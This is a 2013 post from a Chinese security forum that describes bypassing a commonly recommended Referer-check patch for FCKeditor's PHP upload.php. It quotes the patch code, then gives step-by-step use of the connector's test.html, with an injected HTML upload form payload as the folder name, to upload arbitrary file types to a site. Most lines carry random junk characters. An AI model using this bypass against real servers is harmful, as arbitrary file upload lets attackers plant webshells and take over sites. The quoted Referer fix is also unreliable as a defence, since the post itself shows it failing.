找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2229|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php3 E9 V. b9 {& e# N/ H+ c6 t4 o
网上给出的修复方案是
& }* x$ b  h+ W7 }修复方法,删除FCK编辑器用其他的编辑器
% k- t+ {& B8 Q" l& Q! D) Y或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件  p: v( V+ ?+ B# u

3 v1 i& @4 o. Z7 G. A, xrequire(‘config.php’);
& j2 m1 f8 a! e5 l! M; M. k% qrequire(‘util.php’);) ], b+ V* `5 G0 f8 P
的下面添加以下代码—————————–
% H  I" ^2 `/ f. W8 w2 x//防止外部提交. n+ x/ R" G- }( m# W6 m8 _8 C
function outsidepost()- Y+ O/ p6 f. w# r
{
% J0 x' T( Y3 Y7 G8 j& w$ L* s$servername=$_SERVER['SERVER_NAME'];- r* O, Z) ]3 v- n! d
$sub_from=@$_SERVER['HTTP_REFERER'];2 o9 S' [! J8 W
$sub_len=strlen($servername);2 w, h. I, r3 K, P% F) R0 R
$checkfrom=substr($sub_from,7,$sub_len);5 W, k# P2 |7 ~5 }  a0 ~
if($checkfrom!=$servername){1 M  t" S& ?$ q. J
echo(“you don’t outsidepost!”);" s% ?6 F1 G' ^: {" O
exit;
7 `. {( f! F, D5 i' k4 }}
% ]8 m+ @- H, w, ~+ Z}5 a$ _- M8 }* B' g: w: a( H
outsidepost();
: {0 h, N7 A( X& T防止外部提交,但是没有防止内部提交,( P% M2 h1 C6 Q; }8 e% S# h
利用方法:
8 T$ I& {6 S4 m1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
+ _7 v# m  \+ M4 o: v( i: G2,在Current Folder 框输入* O2 O. d  U  F( F& [- G5 A
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>+ d9 D, D. |0 E
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
& F: w% |  R, I; b' {  fPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表